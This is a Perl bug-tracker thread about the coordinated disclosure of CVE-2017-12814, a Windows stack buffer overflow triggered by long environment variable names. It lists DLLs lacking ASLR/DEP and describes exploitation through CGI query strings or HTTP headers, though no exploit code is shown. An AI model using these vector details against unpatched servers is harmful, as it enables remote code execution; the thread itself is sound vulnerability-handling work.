strawberry\perl\lib\auto\Encode\Unicode\Unicode.xs.dll
strawberry\perl\lib\auto\Fcntl\Fcntl.xs.dll
strawberry\perl\lib\auto\File\DosGlob\DosGlob.xs.dll
strawberry\perl\lib\auto\File\Glob\Glob.xs.dll
strawberry\perl\lib\auto\Filter\decrypt\decrypt.xs.dll
strawberry\perl\lib\auto\Filter\tee\tee.xs.dll
strawberry\perl\lib\auto\Filter\Util\Call\Call.xs.dll
strawberry\perl\lib\auto\Filter\Util\Exec\Exec.xs.dll
strawberry\perl\lib\auto\GDBM_File\GDBM_File.xs.dll
strawberry\perl\lib\auto\Hash\Util\Util.xs.dll
strawberry\perl\lib\auto\Hash\Util\FieldHash\FieldHash.xs.dll
strawberry\perl\lib\auto\IO\IO.xs.dll
strawberry\perl\lib\auto\List\Util\Util.xs.dll
strawberry\perl\lib\auto\Math\BigInt\FastCalc\FastCalc.xs.dll
strawberry\perl\lib\auto\MIME\Base64\Base64.xs.dll
strawberry\perl\lib\auto\mro\mro.xs.dll
strawberry\perl\lib\auto\NDBM_File\NDBM_File.xs.dll
strawberry\perl\lib\auto\ODBM_File\ODBM_File.xs.dll
strawberry\perl\lib\auto\Opcode\Opcode.xs.dll
strawberry\perl\lib\auto\PerlIO\encoding\encoding.xs.dll
strawberry\perl\lib\auto\PerlIO\mmap\mmap.xs.dll
strawberry\perl\lib\auto\PerlIO\scalar\scalar.xs.dll
strawberry\perl\lib\auto\PerlIO\via\via.xs.dll
strawberry\perl\lib\auto\POSIX\POSIX.xs.dll
strawberry\perl\lib\auto\re\re.xs.dll
strawberry\perl\lib\auto\SDBM_File\SDBM_File.xs.dll
strawberry\perl\lib\auto\Socket\Socket.xs.dll
strawberry\perl\lib\auto\Storable\Storable.xs.dll
strawberry\perl\lib\auto\Sys\Hostname\Hostname.xs.dll
strawberry\perl\lib\auto\threads\threads.xs.dll
strawberry\perl\lib\auto\threads\shared\shared.xs.dll
strawberry\perl\lib\auto\Tie\Hash\NamedCapture\NamedCapture.xs.dll
strawberry\perl\lib\auto\Time\HiRes\HiRes.xs.dll
strawberry\perl\lib\auto\Time\Piece\Piece.xs.dll
strawberry\perl\lib\auto\Unicode\Collate\Collate.xs.dll
strawberry\perl\lib\auto\Unicode\Normalize\Normalize.xs.dll
strawberry\perl\lib\auto\version\vxs\vxs.xs.dll
strawberry\perl\lib\auto\Win32\Win32.xs.dll
strawberry\perl\lib\auto\Win32API\File\File.xs.dll
strawberry\perl\vendor\lib\auto\B\Hooks\OP\Check\Check.xs.dll
strawberry\perl\vendor\lib\auto\B\Utils\Utils.xs.dll
strawberry\perl\vendor\lib\auto\BerkeleyDB\BerkeleyDB.xs.dll
strawberry\perl\vendor\lib\auto\Class\Load\XS\XS.xs.dll
strawberry\perl\vendor\lib\auto\Class\XSAccessor\XSAccessor.xs.dll
strawberry\perl\vendor\lib\auto\Clone\Clone.xs.dll
strawberry\perl\vendor\lib\auto\Compress\Raw\Lzma\Lzma.xs.dll
strawberry\perl\vendor\lib\auto\Compress\unLZMA\unLZMA.xs.dll
strawberry\perl\vendor\lib\auto\Cpanel\JSON\XS\XS.xs.dll
strawberry\perl\vendor\lib\auto\Crypt\Blowfish\Blowfish.xs.dll
strawberry\perl\vendor\lib\auto\Crypt\DES\DES.xs.dll
strawberry\perl\vendor\lib\auto\Crypt\IDEA\IDEA.xs.dll
strawberry\perl\vendor\lib\auto\Crypt\OpenSSL\AES\AES.xs.dll
strawberry\perl\vendor\lib\auto\Crypt\OpenSSL\Bignum\Bignum.xs.dll
strawberry\perl\vendor\lib\auto\Crypt\OpenSSL\DSA\DSA.xs.dll
strawberry\perl\vendor\lib\auto\Crypt\OpenSSL\Random\Random.xs.dll
strawberry\perl\vendor\lib\auto\Crypt\OpenSSL\RSA\RSA.xs.dll
strawberry\perl\vendor\lib\auto\Crypt\OpenSSL\X509\X509.xs.dll
strawberry\perl\vendor\lib\auto\Crypt\RC6\RC6.xs.dll
strawberry\perl\vendor\lib\auto\Crypt\Rijndael\Rijndael.xs.dll
strawberry\perl\vendor\lib\auto\Crypt\RIPEMD160\RIPEMD160.xs.dll
strawberry\perl\vendor\lib\auto\Crypt\Serpent\Serpent.xs.dll
strawberry\perl\vendor\lib\auto\Crypt\SSLeay\SSLeay.xs.dll
strawberry\perl\vendor\lib\auto\Crypt\Twofish\Twofish.xs.dll
strawberry\perl\vendor\lib\auto\CryptX\CryptX.xs.dll
strawberry\perl\vendor\lib\auto\Data\Dump\Streamer\Streamer.xs.dll
strawberry\perl\vendor\lib\auto\DateTime\DateTime.xs.dll
strawberry\perl\vendor\lib\auto\DBD\mysql\mysql.xs.dll
strawberry\perl\vendor\lib\auto\DBD\ODBC\ODBC.xs.dll
strawberry\perl\vendor\lib\auto\DBD\Oracle\Oracle.xs.dll
strawberry\perl\vendor\lib\auto\DBD\Pg\Pg.xs.dll
strawberry\perl\vendor\lib\auto\DBD\SQLite\SQLite.xs.dll
strawberry\perl\vendor\lib\auto\DBI\DBI.xs.dll
strawberry\perl\vendor\lib\auto\DB_File\DB_File.xs.dll
strawberry\perl\vendor\lib\auto\Devel\Declare\Declare.xs.dll
strawberry\perl\vendor\lib\auto\Digest\MD2\MD2.xs.dll
strawberry\perl\vendor\lib\auto\Digest\SHA1\SHA1.xs.dll
strawberry\perl\vendor\lib\auto\Digest\Whirlpool\Whirlpool.xs.dll
strawberry\perl\vendor\lib\auto\FCGI\FCGI.xs.dll
strawberry\perl\vendor\lib\auto\FFI\Raw\Raw.xs.dll
strawberry\perl\vendor\lib\auto\File\Map\Map.xs.dll
strawberry\perl\vendor\lib\auto\GD\GD.xs.dll
strawberry\perl\vendor\lib\auto\HTML\Parser\Parser.xs.dll
strawberry\perl\vendor\lib\auto\Imager\Imager.xs.dll
strawberry\perl\vendor\lib\auto\Imager\CountColor\CountColor.xs.dll
strawberry\perl\vendor\lib\auto\Imager\File\GIF\GIF.xs.dll
strawberry\perl\vendor\lib\auto\Imager\File\ICO\ICO.xs.dll
strawberry\perl\vendor\lib\auto\Imager\File\JPEG\JPEG.xs.dll
strawberry\perl\vendor\lib\auto\Imager\File\PNG\PNG.xs.dll
strawberry\perl\vendor\lib\auto\Imager\File\SGI\SGI.xs.dll
strawberry\perl\vendor\lib\auto\Imager\File\TIFF\TIFF.xs.dll
strawberry\perl\vendor\lib\auto\Imager\Filter\DynTest\DynTest.xs.dll
strawberry\perl\vendor\lib\auto\Imager\Filter\Flines\Flines.xs.dll
strawberry\perl\vendor\lib\auto\Imager\Filter\Mandelbrot\Mandelbrot.xs.dll
strawberry\perl\vendor\lib\auto\Imager\Font\FT2\FT2.xs.dll
strawberry\perl\vendor\lib\auto\Imager\Font\T1\T1.xs.dll
strawberry\perl\vendor\lib\auto\Imager\Font\W32\W32.xs.dll
strawberry\perl\vendor\lib\auto\JSON\XS\XS.xs.dll
strawberry\perl\vendor\lib\auto\Math\BigInt\GMP\GMP.xs.dll
strawberry\perl\vendor\lib\auto\Math\GMP\GMP.xs.dll
strawberry\perl\vendor\lib\auto\Math\Int64\Int64.xs.dll
strawberry\perl\vendor\lib\auto\Math\MPC\MPC.xs.dll
strawberry\perl\vendor\lib\auto\Math\MPFR\MPFR.xs.dll
strawberry\perl\vendor\lib\auto\Math\MPFR\Prec\Prec.xs.dll
strawberry\perl\vendor\lib\auto\Math\MPFR\Random\Random.xs.dll
strawberry\perl\vendor\lib\auto\Math\MPFR\V\V.xs.dll
strawberry\perl\vendor\lib\auto\Math\Prime\Util\Util.xs.dll
strawberry\perl\vendor\lib\auto\Math\Prime\Util\GMP\GMP.xs.dll
strawberry\perl\vendor\lib\auto\Moose\Moose.xs.dll
strawberry\perl\vendor\lib\auto\MooseX\Role\WithOverloading\WithOverloading.xs.dll
strawberry\perl\vendor\lib\auto\Net\SSH2\SSH2.xs.dll
strawberry\perl\vendor\lib\auto\Net\SSLeay\SSLeay.xs.dll
strawberry\perl\vendor\lib\auto\OpenGL\freeglut.dll
strawberry\perl\vendor\lib\auto\OpenGL\OpenGL.xs.dll
strawberry\perl\vendor\lib\auto\Package\Stash\XS\XS.xs.dll
strawberry\perl\vendor\lib\auto\Params\Util\Util.xs.dll
strawberry\perl\vendor\lib\auto\PerlIO\Layers\Layers.xs.dll
strawberry\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.7\bin\tidyp.exe
strawberry\perl\vendor\lib\auto\Socket6\Socket6.xs.dll
strawberry\perl\vendor\lib\auto\Sub\Identify\Identify.xs.dll
strawberry\perl\vendor\lib\auto\Sub\Name\Name.xs.dll
strawberry\perl\vendor\lib\auto\Sys\Syslog\PerlLog.dll
strawberry\perl\vendor\lib\auto\Sys\Syslog\Syslog.xs.dll
strawberry\perl\vendor\lib\auto\Template\Stash\XS\XS.xs.dll
strawberry\perl\vendor\lib\auto\Term\ReadKey\ReadKey.xs.dll
strawberry\perl\vendor\lib\auto\Test\LeakTrace\LeakTrace.xs.dll
strawberry\perl\vendor\lib\auto\Text\CSV_XS\CSV_XS.xs.dll
strawberry\perl\vendor\lib\auto\Text\Soundex\Soundex.xs.dll
strawberry\perl\vendor\lib\auto\Time\Moment\Moment.xs.dll
strawberry\perl\vendor\lib\auto\Unicode\LineBreak\LineBreak.xs.dll
strawberry\perl\vendor\lib\auto\Unicode\UTF8\UTF8.xs.dll
strawberry\perl\vendor\lib\auto\Variable\Magic\Magic.xs.dll
strawberry\perl\vendor\lib\auto\Win32\API\API.xs.dll
strawberry\perl\vendor\lib\auto\Win32\API\Callback\Callback.xs.dll
strawberry\perl\vendor\lib\auto\Win32\Console\Console.xs.dll
strawberry\perl\vendor\lib\auto\Win32\Console\ANSI\ANSI.xs.dll
strawberry\perl\vendor\lib\auto\Win32\Daemon\Daemon.xs.dll
strawberry\perl\vendor\lib\auto\Win32\EventLog\EventLog.xs.dll
strawberry\perl\vendor\lib\auto\Win32\Exe\InsertResourceSection\InsertResourceSection.xs.dll
strawberry\perl\vendor\lib\auto\Win32\File\File.xs.dll
strawberry\perl\vendor\lib\auto\Win32\GuiTest\GuiTest.xs.dll
strawberry\perl\vendor\lib\auto\Win32\Job\Job.xs.dll
strawberry\perl\vendor\lib\auto\Win32\OLE\OLE.xs.dll
strawberry\perl\vendor\lib\auto\Win32\Pipe\Pipe.xs.dll
strawberry\perl\vendor\lib\auto\Win32\Process\Process.xs.dll
strawberry\perl\vendor\lib\auto\Win32\Service\Service.xs.dll
strawberry\perl\vendor\lib\auto\Win32\UTCFileTime\UTCFileTime.xs.dll
strawberry\perl\vendor\lib\auto\Win32\WinError\WinError.xs.dll
strawberry\perl\vendor\lib\auto\Win32API\Registry\Registry.xs.dll
strawberry\perl\vendor\lib\auto\XML\LibXML\LibXML.xs.dll
strawberry\perl\vendor\lib\auto\XML\LibXSLT\LibXSLT.xs.xs.dll
strawberry\perl\vendor\lib\auto\XML\Parser\Expat\Expat.xs.dll
strawberry\perl\vendor\lib\auto\YAML\XS\LibYAML\LibYAML.xs.dll

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Aug 9, 2017

From @tonycoz

On Mon, 07 Aug 2017 11​:13​:34 -0700, john@​autosectools.com wrote​:

I would say this warrants a CVE as it is highly exploitable, especially
given the lack of mitigations in the two major windows builds, as
demonstrated by the exploit provided. Shellshock proved that there are
numerous vectors for controlling environment arguments, so it stands to
reason that the same is true for keys. Especially so, considering
complete control of the key is not necessary--even if the tainted key
data is prefixed and suffixed with trusted data, this vuln can still
exploited.

Also, to further expand upon the impact of this issue, please find
attached a list of all modules in ActiveState and Strawberry Perl that
had ASLR and/or DEP disabled.

That's probably our issue - the fixed base for the perl dll was introduced in 9d24289.

As to allocating a CVE ID, I'm not sure how.

Going by http​://cve.mitre.org/cve/request_id.html

- Redhat isn't suitable, this issue has no effect on Linux

- the DWF form is for public issues only

- the other CNAs appear to allocate ids for their own products only

The Mitre form doesn't indicate whether the issue will immediately become public, I've mailed cve@​mitre.org about it.

Tony

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Aug 10, 2017

From @tonycoz

Hi,

We have a confirmed Win32 specific perl security issue, and I'd like
to arrange for a co-ordinated release of a fixed ActivePerl and public
disclosure of the problem.

Are you the correct person to deal with this?

Your name/email came up in another issue [perl #129251] which ended up
not being a perl/ActiveState issue, but you stated​:

Actually, I'll check if we have a general security@​ address
or create one if not. I'll get back to you on that.

but I didn't see a follow-up on that.

Thanks,
Tony

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Aug 10, 2017

From andyg@activestate.com

Hi Tony,

Thanks, please include both Dave Rolsky and myself in discussions about
this issue. We are in the process of preparing new 5.22/5.24/5.26
ActivePerl releases for later this month, so we should definitely be able
to get this addressed quickly.

-Andy

On Wed, Aug 9, 2017 at 9​:13 PM Tony Cook <tony@​develop-help.com> wrote​:

Hi,

We have a confirmed Win32 specific perl security issue, and I'd like
to arrange for a co-ordinated release of a fixed ActivePerl and public
disclosure of the problem.

Are you the correct person to deal with this?

Your name/email came up in another issue [perl #129251] which ended up
not being a perl/ActiveState issue, but you stated​:

Actually, I'll check if we have a general security@​ address
or create one if not. I'll get back to you on that.

but I didn't see a follow-up on that.

Thanks,
Tony

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Aug 11, 2017

From @tonycoz

On Tue, 08 Aug 2017 22​:48​:27 -0700, tonyc wrote​:

On Mon, 07 Aug 2017 11​:13​:34 -0700, john@​autosectools.com wrote​:

I would say this warrants a CVE as it is highly exploitable,
especially
given the lack of mitigations in the two major windows builds, as
demonstrated by the exploit provided. Shellshock proved that there
are
numerous vectors for controlling environment arguments, so it stands
to
reason that the same is true for keys. Especially so, considering
complete control of the key is not necessary--even if the tainted key
data is prefixed and suffixed with trusted data, this vuln can still
exploited.

Also, to further expand upon the impact of this issue, please find
attached a list of all modules in ActiveState and Strawberry Perl
that
had ASLR and/or DEP disabled.

That's probably our issue - the fixed base for the perl dll was
introduced in 9d24289.

As to allocating a CVE ID, I'm not sure how.

I've requested a CVE ID for this issue.

Tony

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Aug 12, 2017

From @tonycoz

On Fri, 11 Aug 2017 03​:17​:17 -0700, tonyc wrote​:

I've requested a CVE ID for this issue.

This is CVE-2017-12814.

Tony

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Aug 22, 2017

From andyg@activestate.com

On Tue, 08 Aug 2017 22​:48​:27 -0700, tonyc wrote​:

On Mon, 07 Aug 2017 11​:13​:34 -0700, john@​autosectools.com wrote​:

Also, to further expand upon the impact of this issue, please find
attached a list of all modules in ActiveState and Strawberry Perl
that
had ASLR and/or DEP disabled.

That's probably our issue - the fixed base for the perl dll was
introduced in 9d24289.

The relocation stuff is a pretty messy issue, but I believe we build things this way because you can get address space collisions in rare cases when using many large XS modules (Wx comes to mind). bulk88 and Jan Dubois probably know the most about this issue. One bug to see is https://rt.cpan.org/Ticket/Display.html?id=78395

As for this patch, it's nice and simple and is working fine in our builds. It applies cleanly back through 5.18, and I will back-port it down to 5.8 for our enterprise customers. ActivePerl for those versions is built with Visual Studio, but I don't know if this is a more or less severe issue there.

So what are the next steps here? Since this bug only affects Windows, is it enough to warrant a new point release? We had been on track to release 5.22.4, 5.24.2, and 5.26.0 before the end of August, and the patch could go in those if you don't think we need an upstream release.

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Aug 23, 2017

From @autarch

To build on what Andy said, we'd really like to be able to schedule our releases for this quarter.

We do private releases to customers of our Enterprise builds. This would disclose the vulnerability to a small group of people. We also do Community releases which are freely available on our website. This would disclose the vulnerability to essentially everybody.

Can we come up with a schedule for disclosing this bug? I assume the goal is to synchronize the bug disclosure with our Community releases and with a new Strawberry Perl release. What do we need to do to make that happen?

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Aug 23, 2017

From @tonycoz

On Tue, 22 Aug 2017 12​:25​:05 -0700, andyg@​activestate.com wrote​:

On Tue, 08 Aug 2017 22​:48​:27 -0700, tonyc wrote​:

On Mon, 07 Aug 2017 11​:13​:34 -0700, john@​autosectools.com wrote​:

Also, to further expand upon the impact of this issue, please find
attached a list of all modules in ActiveState and Strawberry Perl
that
had ASLR and/or DEP disabled.

That's probably our issue - the fixed base for the perl dll was
introduced in 9d24289.

The relocation stuff is a pretty messy issue, but I believe we build
things this way because you can get address space collisions in rare
cases when using many large XS modules (Wx comes to mind). bulk88 and
Jan Dubois probably know the most about this issue. One bug to see is
https://rt.cpan.org/Ticket/Display.html?id=78395

From the discussions this is a tools bug, not a bug in Perl, and this bug can cause problems even if all of the executables/DLLs involved have non-overlapping base addresses (since some third-party DLL can cause a conflict.)

As for this patch, it's nice and simple and is working fine in our
builds. It applies cleanly back through 5.18, and I will back-port it
down to 5.8 for our enterprise customers. ActivePerl for those
versions is built with Visual Studio, but I don't know if this is a
more or less severe issue there.

So what are the next steps here? Since this bug only affects Windows,
is it enough to warrant a new point release? We had been on track to
release 5.22.4, 5.24.2, and 5.26.0 before the end of August, and the
patch could go in those if you don't think we need an upstream
release.

I haven't heard back from kmx yet, at this point I'm inclined to go ahead on this issue, but...

We hsve two other non-Win32-specific issues

https://rt-archive.perl.org/perl5/Ticket/Display.html?id=131598
https://rt-archive.perl.org/perl5/Ticket/Display.html?id=131582

(which I believe you now have access to)

that we have CVE IDs for and we were planning to disclose at the same time.

Last time I discussed this with Sawyer he was going to notify the disclosure mailing list once they all have CVE IDs, but it might have fallen off his radar.

Tony

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Sep 10, 2017

From @steve-m-hay

Now in blead as commit 8586647. Will shortly also be in 5.24.3-RC1 and 5.26.1-RC1...

1 similar comment
@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Sep 10, 2017

From @steve-m-hay

Now in blead as commit 8586647. Will shortly also be in 5.24.3-RC1 and 5.26.1-RC1...

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Sep 11, 2017

From @xsawyerx

This was set to be disclosed on September 22nd. Disclosure list was informed.

On 10 September 2017 at 16​:17, Steve Hay via RT <rt-comment@​perl.org> wrote​:

Now in blead as commit 8586647. Will shortly also be in 5.24.3-RC1 and 5.26.1-RC1...

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Sep 11, 2017

From @tonycoz

On Fri, 11 Aug 2017 17​:52​:21 -0700, tonyc wrote​:

On Fri, 11 Aug 2017 03​:17​:17 -0700, tonyc wrote​:

I've requested a CVE ID for this issue.

This is CVE-2017-12814.

The details I entered when requesting the CVE ID​:

[Suggested description]
Will be made public once co-ordinated release is done.
------------------------------------------
[Vulnerability Type]
Buffer Overflow

------------------------------------------
[Vendor of Product]
Perl5 Porters
------------------------------------------
[Affected Product Code Base]
perl - 5.005_03 through 5.26
------------------------------------------
[Affected Component]

------------------------------------------
[Attack Type]
Local

------------------------------------------
[Impact ]

[+] CVE_Request.Impact_Code_execution
[-] CVE_Request.Impact_Denial_of_Service
[-] CVE_Request.Impact_Escalation_of_Privileges
[-] CVE_Request.Impact_Information_Disclosure
------------------------------------------
[Attack Vectors]

------------------------------------------
[Reference ]

------------------------------------------
[Discoverer ]
John Leitch (john@​autosectools.com), Bryce Darling (darlingbryce@​gmail.com)

Proposed update for the CVE entry once the issue is public (the field names are from the CVE allocation form)​:

Suggested description​:

Stack buffer overflow with crafted environment variable, leading to code execution

Affected components​:

CPerlHost​::Add() in win32/perlhost.h

Attack vector​:

An attacker can provide a long environment variable name
overflowing a stack allocated buffer.

This issue only occurs for Win32 builds of perl.

Discoverer​:

John Leitch (john@​autosectools.com), Bryce Darling (darlingbryce@​gmail.com) (no change)

Affected Product Code Base​:

perl - 5.005_03 through 5.26 (no change)

References​:

https://rt.perl.org/Public/Bug/Display.html?id=131665

Tony

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Sep 23, 2017

From @AutoSecTools

Hi all,

One quick but important nitpick. This vulnerability is described as a possible stack overflow here​: https://metacpan.org/changes/release/SHAY/perl-5.26.1-RC1#%5BCVE-2017-12814%5D-$ENV%7B$key%7D-stack-buffer-overflow-on-Windows

While it's true that I said this is possibly exploitable depending on context, there is no question that it is a stack overflow, as the exploit PoC demonstrates. Further, I prefixed my exploitability claim with "possibly" solely to avoid speaking in absolutes. I would say this is highly exploitable in most scenarios that expose env keys as attack surface.

Our main concern here is that people may underestimate the severity, and our advisory will contain multiple exploits demonstrating scenarios wherein this can be remote. Internally (we don't name bugs as that's rather tacky) we affectionately refer to this one as "PerlShock," and it is by far the most critical issue we have discovered in a language to date.

To provide an example, it's not uncommon for CGI web apps to save query strings name value pairs as env vars. In this case, the vulnerability would be exploitable through said query string. Though we have no concrete statistics, we have seen this pattern in the wild and thus expect this issue to have real-world ramifications.

John

--------- Original Message --------- Subject​: [perl #131665] [CVE-2017-12814]Perl $ENV Key Stack Buffer Overflow
From​: "Tony Cook via RT" <perl5-security-report-followup@​perl.org>
Date​: 9/11/17 4​:50 pm
To​: john@​autosectools.com
Cc​: andyg@​activestate.com, daver@​activestate.com

On Fri, 11 Aug 2017 17​:52​:21 -0700, tonyc wrote​:

On Fri, 11 Aug 2017 03​:17​:17 -0700, tonyc wrote​:

I've requested a CVE ID for this issue.

This is CVE-2017-12814.

The details I entered when requesting the CVE ID​:

[Suggested description]
Will be made public once co-ordinated release is done.
------------------------------------------
[Vulnerability Type]
Buffer Overflow

------------------------------------------
[Vendor of Product]
Perl5 Porters
------------------------------------------
[Affected Product Code Base]
perl - 5.005_03 through 5.26
------------------------------------------
[Affected Component]

------------------------------------------
[Attack Type]
Local

------------------------------------------
[Impact ]

[+] CVE_Request.Impact_Code_execution
[-] CVE_Request.Impact_Denial_of_Service
[-] CVE_Request.Impact_Escalation_of_Privileges
[-] CVE_Request.Impact_Information_Disclosure
------------------------------------------
[Attack Vectors]

------------------------------------------
[Reference ]

------------------------------------------
[Discoverer ]
John Leitch (john@​autosectools.com), Bryce Darling (darlingbryce@​gmail.com)

Proposed update for the CVE entry once the issue is public (the field names are from the CVE allocation form)​:

Suggested description​:

Stack buffer overflow with crafted environment variable, leading to code execution

Affected components​:

CPerlHost​::Add() in win32/perlhost.h

Attack vector​:

An attacker can provide a long environment variable name
overflowing a stack allocated buffer.

This issue only occurs for Win32 builds of perl.

Discoverer​:

John Leitch (john@​autosectools.com), Bryce Darling (darlingbryce@​gmail.com) (no change)

Affected Product Code Base​:

perl - 5.005_03 through 5.26 (no change)

References​:

https://rt.perl.org/Public/Bug/Display.html?id=131665

Tony

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Sep 23, 2017

From @AutoSecTools

Addendum​: a quick search for an example revealed that custom headers may be stored in env​:

https://stackoverflow.com/questions/4007007/how-do-i-access-the-http-header-of-request-in-a-cgi-script

I will investigate further this weekend, but there's a good chance this is a viable exploitation vector.

--------- Original Message --------- Subject​: RE​: [perl #131665] [CVE-2017-12814]Perl $ENV Key Stack Buffer Overflow
From​: john@​autosectools.com
Date​: 9/22/17 6​:23 pm
To​: perl5-security-report-followup@​perl.org
Cc​: andyg@​activestate.com, daver@​activestate.com

Hi all,

One quick but important nitpick. This vulnerability is described as a possible stack overflow here​: https://metacpan.org/changes/release/SHAY/perl-5.26.1-RC1#%5BCVE-2017-12814%5D-$ENV%7B$key%7D-stack-buffer-overflow-on-Windows

While it's true that I said this is possibly exploitable depending on context, there is no question that it is a stack overflow, as the exploit PoC demonstrates. Further, I prefixed my exploitability claim with "possibly" solely to avoid speaking in absolutes. I would say this is highly exploitable in most scenarios that expose env keys as attack surface.

Our main concern here is that people may underestimate the severity, and our advisory will contain multiple exploits demonstrating scenarios wherein this can be remote. Internally (we don't name bugs as that's rather tacky) we affectionately refer to this one as "PerlShock," and it is by far the most critical issue we have discovered in a language to date.

To provide an example, it's not uncommon for CGI web apps to save query strings name value pairs as env vars. In this case, the vulnerability would be exploitable through said query string. Though we have no concrete statistics, we have seen this pattern in the wild and thus expect this issue to have real-world ramifications.

John

--------- Original Message --------- Subject​: [perl #131665] [CVE-2017-12814]Perl $ENV Key Stack Buffer Overflow
From​: "Tony Cook via RT" <perl5-security-report-followup@​perl.org>
Date​: 9/11/17 4​:50 pm
To​: john@​autosectools.com
Cc​: andyg@​activestate.com, daver@​activestate.com

On Fri, 11 Aug 2017 17​:52​:21 -0700, tonyc wrote​:

On Fri, 11 Aug 2017 03​:17​:17 -0700, tonyc wrote​:

I've requested a CVE ID for this issue.

This is CVE-2017-12814.

The details I entered when requesting the CVE ID​:

[Suggested description]
Will be made public once co-ordinated release is done.
------------------------------------------
[Vulnerability Type]
Buffer Overflow

------------------------------------------
[Vendor of Product]
Perl5 Porters
------------------------------------------
[Affected Product Code Base]
perl - 5.005_03 through 5.26
------------------------------------------
[Affected Component]

------------------------------------------
[Attack Type]
Local

------------------------------------------
[Impact ]

[+] CVE_Request.Impact_Code_execution
[-] CVE_Request.Impact_Denial_of_Service
[-] CVE_Request.Impact_Escalation_of_Privileges
[-] CVE_Request.Impact_Information_Disclosure
------------------------------------------
[Attack Vectors]

------------------------------------------
[Reference ]

------------------------------------------
[Discoverer ]
John Leitch (john@​autosectools.com), Bryce Darling (darlingbryce@​gmail.com)

Proposed update for the CVE entry once the issue is public (the field names are from the CVE allocation form)​:

Suggested description​:

Stack buffer overflow with crafted environment variable, leading to code execution

Affected components​:

CPerlHost​::Add() in win32/perlhost.h

Attack vector​:

An attacker can provide a long environment variable name
overflowing a stack allocated buffer.

This issue only occurs for Win32 builds of perl.

Discoverer​:

John Leitch (john@​autosectools.com), Bryce Darling (darlingbryce@​gmail.com) (no change)

Affected Product Code Base​:

perl - 5.005_03 through 5.26 (no change)

References​:

https://rt.perl.org/Public/Bug/Display.html?id=131665

Tony

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Sep 23, 2017

From @tonycoz

Yes, custom CGI headers are passed through with the header name
upper-cased, - replaced with _ and HTTP_ prefixed.

https://tools.ietf.org/html/rfc3875#section-4.1.18

Tony

On Fri, Sep 22, 2017 at 06​:28​:11PM -0700, john@​autosectools.com wrote​:

Addendum​: a quick search for an example revealed that custom headers may be stored in env​:

https://stackoverflow.com/questions/4007007/how-do-i-access-the-http-header-of-request-in-a-cgi-script

I will investigate further this weekend, but there's a good chance this is a viable exploitation vector.

--------- Original Message --------- Subject​: RE​: [perl #131665] [CVE-2017-12814]Perl $ENV Key Stack Buffer Overflow
From​: john@​autosectools.com
Date​: 9/22/17 6​:23 pm
To​: perl5-security-report-followup@​perl.org
Cc​: andyg@​activestate.com, daver@​activestate.com

Hi all,

One quick but important nitpick. This vulnerability is described as a possible stack overflow here​: https://metacpan.org/changes/release/SHAY/perl-5.26.1-RC1#%5BCVE-2017-12814%5D-$ENV%7B$key%7D-stack-buffer-overflow-on-Windows

While it's true that I said this is possibly exploitable depending on context, there is no question that it is a stack overflow, as the exploit PoC demonstrates. Further, I prefixed my exploitability claim with "possibly" solely to avoid speaking in absolutes. I would say this is highly exploitable in most scenarios that expose env keys as attack surface.

Our main concern here is that people may underestimate the severity, and our advisory will contain multiple exploits demonstrating scenarios wherein this can be remote. Internally (we don't name bugs as that's rather tacky) we affectionately refer to this one as "PerlShock," and it is by far the most critical issue we have discovered in a language to date.

To provide an example, it's not uncommon for CGI web apps to save query strings name value pairs as env vars. In this case, the vulnerability would be exploitable through said query string. Though we have no concrete statistics, we have seen this pattern in the wild and thus expect this issue to have real-world ramifications.

John

--------- Original Message --------- Subject​: [perl #131665] [CVE-2017-12814]Perl $ENV Key Stack Buffer Overflow
From​: "Tony Cook via RT" <perl5-security-report-followup@​perl.org>
Date​: 9/11/17 4​:50 pm
To​: john@​autosectools.com
Cc​: andyg@​activestate.com, daver@​activestate.com

On Fri, 11 Aug 2017 17​:52​:21 -0700, tonyc wrote​:

On Fri, 11 Aug 2017 03​:17​:17 -0700, tonyc wrote​:

I've requested a CVE ID for this issue.

This is CVE-2017-12814.

The details I entered when requesting the CVE ID​:

[Suggested description]
Will be made public once co-ordinated release is done.
------------------------------------------
[Vulnerability Type]
Buffer Overflow

------------------------------------------
[Vendor of Product]
Perl5 Porters
------------------------------------------
[Affected Product Code Base]
perl - 5.005_03 through 5.26
------------------------------------------
[Affected Component]

------------------------------------------
[Attack Type]
Local

------------------------------------------
[Impact ]

[+] CVE_Request.Impact_Code_execution
[-] CVE_Request.Impact_Denial_of_Service
[-] CVE_Request.Impact_Escalation_of_Privileges
[-] CVE_Request.Impact_Information_Disclosure
------------------------------------------
[Attack Vectors]

------------------------------------------
[Reference ]

------------------------------------------
[Discoverer ]
John Leitch (john@​autosectools.com), Bryce Darling (darlingbryce@​gmail.com)

Proposed update for the CVE entry once the issue is public (the field names are from the CVE allocation form)​:

Suggested description​:

Stack buffer overflow with crafted environment variable, leading to code execution

Affected components​:

CPerlHost​::Add() in win32/perlhost.h

Attack vector​:

An attacker can provide a long environment variable name
overflowing a stack allocated buffer.

This issue only occurs for Win32 builds of perl.

Discoverer​:

John Leitch (john@​autosectools.com), Bryce Darling (darlingbryce@​gmail.com) (no change)

Affected Product Code Base​:

perl - 5.005_03 through 5.26 (no change)

References​:

https://rt.perl.org/Public/Bug/Display.html?id=131665

Tony

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Sep 23, 2017

From @xsawyerx

Based on this, should we postpone the disclosure of the RT ticket?

